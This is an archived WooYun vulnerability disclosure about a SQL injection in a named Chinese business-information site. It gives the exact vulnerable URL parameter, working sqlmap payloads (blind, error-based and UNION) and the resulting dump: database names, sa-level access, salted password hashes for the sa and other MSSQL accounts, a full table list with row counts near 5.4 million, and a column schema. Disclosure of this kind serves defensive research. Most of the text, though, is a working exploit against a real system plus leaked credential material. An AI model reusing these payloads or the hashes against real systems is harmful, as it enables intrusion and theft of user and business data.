乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-17: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-01-28: 厂商已经主动忽略漏洞,细节向公众公开
易资源网某处注入漏洞(SA权限),泄露500+W敏感信息(用户名,密码,商家信息,企业信息等等)。。。。。。
注入点:http://www.easysources.cn/z_yijiadan.aspx?id=678880 直接跑出500多万数据,其中包括很多的账号,密码,商家信息,企业信息等等。。。一共 5443333 Entries
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=678880 AND 6992=6992 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=678880 AND 4920=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (4920=4920) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(98)+CHAR(113))) Type: UNION query Title: Generic UNION query (NULL) - 73 columns Payload: id=678880 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(112)+CHAR(120)+CHAR(113)+CHAR(89)+CHAR(112)+CHAR(112)+CHAR(97)+CHAR(87)+CHAR(86)+CHAR(99)+CHAR(86)+CHAR(102)+CHAR(72)+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-----[12:31:23] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 4.0.30128back-end DBMS: Microsoft SQL Server 2008available databases [18]:[*] BiddingSystemDB[*] CMSHY[*] CmsProject[*] cmsutm[*] comfort__aspnetdb[*] comfort_mainDB[*] comfort_SnsDB[*] comfort_webcastdb[*] HYCMS[*] master[*] model[*] msdb[*] NewEs168[*] ReportServer[*] ReportServerTempDB[*] RobotAlliance[*] tempdb[*] utmcmscurrent user: 'sa'current database: 'NewEs168'database management system users password hashes:[*] ##MS_PolicyEventProcessingLogin## [1]: password hash: 0x01003869d680adf63db291c6737f1efb8e4a481b02284215913f header: 0x0100 salt: 3869d680 mixedcase: adf63db291c6737f1efb8e4a481b02284215913f[*] ##MS_PolicyTsqlExecutionLogin## [1]: password hash: 0x01008d22a249df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f header: 0x0100 salt: 8d22a249 mixedcase: df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f[*] hsren [1]: password hash: 0x0100539783849001013fc6215c2435a18e4cdf99441aaae33616 header: 0x0100 salt: 53978384 mixedcase: 9001013fc6215c2435a18e4cdf99441aaae33616[*] sa [1]: password hash: 0x010056049b0ea92e2f466555aaf1b643bceeeb0c46cde129d459 header: 0x0100 salt: 56049b0e mixedcase: a92e2f466555aaf1b643bceeeb0c46cde129d459[*] siteserver [1]: password hash: 0x0100dc6415e2ad351a04d5733b27735954040e24f257cae37726 header: 0x0100 salt: dc6415e2 mixedcase: ad351a04d5733b27735954040e24f257cae37726Database: NewEs168[167 tables]+------------------------------+| Advertise || Advertise || Banner || Brand || Cec_Assistance || Cec_SignUp || ChinaArea || D99_CMD || D99_REG || D99_Tmp || DIY_TEMPCOMMAND_TABLE || EmailPost || Enquirys || GetOptionalStock || InfoType || Layout || MailOrder || NewsSearch || NiMing || PartProdict || Questionnaires || Reply || S3_Tmp || SearchRecord || Survey_Questions || TypeProduct || Uv_SupplyDemand || V_CompanyDownload || V_CompanyDynamic || V_CompanySupplyDemand || V_GetRecyleList || V_NewsSearch || V_SupplyDemand || V_Survey || V_seniority || VideoInfo || Whir_AccessStat || Whir_AdZone || Whir_AdminInfo || Whir_AdminRole || Whir_Choice || Whir_ChoiceType || Whir_Column || Whir_CommonCategory1 || Whir_CommonCategory1 || Whir_CommonCategory2 || Whir_ErrorLog || Whir_FieldCheckBox || Whir_FieldCheckBox || Whir_FieldDateText || Whir_FieldEditor || Whir_FieldOption || Whir_FieldText || Whir_FieldUpload || Whir_IP || Whir_JobRequest || Whir_ModelForm || Whir_ModelForm || Whir_ModelForms || Whir_ModelTemplate || Whir_Module || Whir_OpenFund || Whir_OperateLog || Whir_Publish || Whir_Reply || Whir_Source || Whir_SurveyItem_record || Whir_SurveyItem_record || Whir_SurveyItem_record || Whir_Tag || Whir_U_Application || Whir_U_Banner || Whir_U_Certificate || Whir_U_CirculateNum || Whir_U_Column || Whir_U_ComapnyVideo || Whir_U_CommunityForumHF || Whir_U_CommunityForumHF || Whir_U_CommunityForumHF || Whir_U_Company11 || Whir_U_Company11 || Whir_U_CompanyAd || Whir_U_CompanyAnalyse || Whir_U_CompanyCardCollection || Whir_U_CompanyCardCollection || Whir_U_CompanyCertificate || Whir_U_CompanyCollection || Whir_U_CompanyCommunity || Whir_U_CompanyConsultation || Whir_U_CompanyDownload || Whir_U_CompanyDynamic || Whir_U_CompanyInformationPL || Whir_U_CompanyKeyWord || Whir_U_CompanyLinkmodel || Whir_U_CompanyMessage || Whir_U_CompanyRank || Whir_U_CompanyRate || Whir_U_CompanySkin || Whir_U_CompanySubscribeInfo || Whir_U_CompanySubscribeInfo || Whir_U_CompanySupplyDemand || Whir_U_CompanyType || Whir_U_CompanyUserFK || Whir_U_CompanyVideo || Whir_U_CompayShow || Whir_U_Corporation || Whir_U_CreateVote || Whir_U_DynamicInfo || Whir_U_Expert || Whir_U_Financing || Whir_U_ForeignCurrency || Whir_U_FriendLink || Whir_U_GettherRule || Whir_U_HotReviews || Whir_U_Income || Whir_U_Info || Whir_U_InformationPL || Whir_U_Information_Gen || Whir_U_Information_Gen || Whir_U_InspanidualDetail || Whir_U_InspanidualDetail || Whir_U_InspanidualInfo || Whir_U_KeyWord || Whir_U_Product || Whir_U_Report || Whir_U_SinglePage || Whir_U_StockNameCode || Whir_U_StockNameCode || Whir_U_StockResult || Whir_U_SupInform || Whir_U_Template || Whir_U_Tender || Whir_U_TopicTech || Whir_U_TopicVideo || Whir_U_Topics || Whir_U_UserGroup || Whir_U_UserGroup || Whir_U_UserMessage || Whir_U_UserRecharge || Whir_U_UserSubscribe || Whir_U_VideoMessage || Whir_U_VideoMessage || Whir_U_companyFriendLink || Whir_U_companyFriendLink || Whir_U_email || Whir_U_optionalstock || Whir_U_test || Whir_U_userorder || Whir_U_ztlm || Whir_U_ztlm || Whir_WordFilter || Z_RenZheng || Z_Yijiadan || clicknum || comd_list || dtproperties || t_jiaozhu || uv_CompanyKeywordks || uv_CompanyKeywordks || uv_CompanyList || uv_Info_Top5 || uv_NewSupplyTop3 || 临时表 || 商机信息2 || 商机信息2 || 标准企业信息表 || 标准商机信息表 |+------------------------------+
Database: NewEs168+----------------------------------+---------+| Table | Entries |+----------------------------------+---------+| dbo.Whir_U_CompanyAnalyse | 5443333 || dbo.V_CompanySupplyDemand | 487368 || dbo.V_SupplyDemand | 487368 || dbo.Whir_U_CompanySupplyDemand | 487368 || dbo.Uv_SupplyDemand | 383335 || dbo.SearchRecord | 251157 || dbo.Whir_U_CompanyType | 107810 || dbo.Whir_U_CompanyLinkmodel | 77970 || dbo.uv_CompanyList | 77834 || dbo.Whir_U_CompanyRate | 24015 || dbo.商机信息2 | 18710 || dbo.商机信息2 | 18710 || dbo.Whir_OperateLog | 18201 || dbo.Whir_U_Information_Gen | 10749 || dbo.Whir_U_Information_Gen | 10749 || dbo.Banner | 7374 || dbo.Whir_U_CompanyUserFK | 7000 || dbo.NiMing | 6333 || dbo.ChinaArea | 3525 || dbo.临时表 | 3517 || dbo.Whir_U_StockNameCode | 2385 || dbo.Whir_U_StockNameCode | 2385 || dbo.Whir_U_StockResult | 2340 || dbo.Whir_U_companyFriendLink | 1837 || dbo.Whir_U_companyFriendLink | 1837 || dbo.V_CompanyDynamic | 1831 || dbo.Whir_U_CompanyDynamic | 1831 || dbo.Whir_CommonCategory1 | 1366 || dbo.Whir_CommonCategory1 | 1366 || dbo.Whir_OpenFund | 1190 || dbo.Whir_U_Report | 1150 || dbo.V_seniority | 1074 || dbo.Whir_U_InspanidualInfo | 1074 || dbo.Whir_CommonCategory2 | 573 || dbo.Whir_U_CompanyVideo | 478 || dbo.TypeProduct | 409 || dbo.Whir_U_Product | 409 || dbo.Whir_Column | 313 || dbo.Whir_U_CompanyCertificate | 278 || dbo.Enquirys | 241 || dbo.PartProdict | 233 || dbo.Whir_U_Tender | 206 || dbo.Z_RenZheng | 177 || dbo.Whir_FieldText | 173 || dbo.Whir_U_Company11 | 171 || dbo.Whir_U_Company11 | 171 || dbo.Whir_U_InspanidualDetail | 164 || dbo.Whir_U_InspanidualDetail | 164 || dbo.Whir_U_CompanyKeyWord | 127 || dbo.Whir_U_CompanyInformationPL | 84 || dbo.Whir_U_InformationPL | 82 || dbo.Whir_U_Banner | 80 || dbo.MailOrder | 79 || dbo.Whir_FieldOption | 69 || dbo.Advertise | 53 || dbo.Advertise | 53 || dbo.V_CompanyDownload | 45 || dbo.Whir_U_CompanyDownload | 45 || dbo.Whir_U_CompanyCollection | 42 || dbo.Whir_U_GettherRule | 38 || dbo.Whir_U_Info | 38 || dbo.Whir_ModelForm | 33 || dbo.Whir_ModelForm | 33 || dbo.Whir_U_CompanyConsultation | 25 || dbo.Whir_FieldDateText | 24 || dbo.Whir_FieldEditor | 24 || dbo.Whir_U_Expert | 24 || dbo.Whir_AdminInfo | 23 || dbo.Whir_FieldUpload | 23 || dbo.S3_Tmp | 21 || dbo.V_Survey | 18 || dbo.Whir_U_SinglePage | 18 || dbo.Whir_U_email | 17 || dbo.Whir_U_VideoMessage | 17 || dbo.Whir_U_VideoMessage | 17 || dbo.Whir_AdminRole | 14 || dbo.Whir_U_CompanySkin | 13 || dbo.Whir_U_Application | 11 || dbo.Whir_SurveyItem_record | 10 || dbo.Whir_SurveyItem_record | 10 || dbo.Whir_SurveyItem_record | 10 || dbo.Whir_U_CompanyCardCollection | 10 || dbo.Whir_U_CompanyCardCollection | 10 || dbo.EmailPost | 8 || dbo.Whir_U_Financing | 8 || dbo.Whir_U_CompanyMessage | 7 || dbo.Whir_U_CompanyAd | 6 || dbo.comd_list | 5 || dbo.D99_CMD | 5 || dbo.Whir_Module | 5 || dbo.Whir_U_CirculateNum | 5 || dbo.Whir_U_CompanySubscribeInfo | 4 || dbo.Whir_U_CompanySubscribeInfo | 4 || dbo.uv_NewSupplyTop3 | 3 || dbo.Whir_U_DynamicInfo | 3 || dbo.Whir_U_UserMessage | 3 || dbo.Z_Yijiadan | 3 || dbo.Whir_U_CompanyRank | 2 || dbo.Whir_U_KeyWord | 2 || dbo.Whir_U_Topics | 1 |+----------------------------------+---------+Database: NewEs168Table: Whir_U_CompanyAnalyse[8 columns]+---------------------------+----------+| Column | Type |+---------------------------+----------+| address | varchar || CompanyID | int || Date | datetime || Mune | nvarchar || TypeID | int || UserID | int || UserName | varchar || Whir_U_CompanyAnalyse_PID | int |+---------------------------+----------+
修复
未能联系到厂商或者厂商积极拒绝
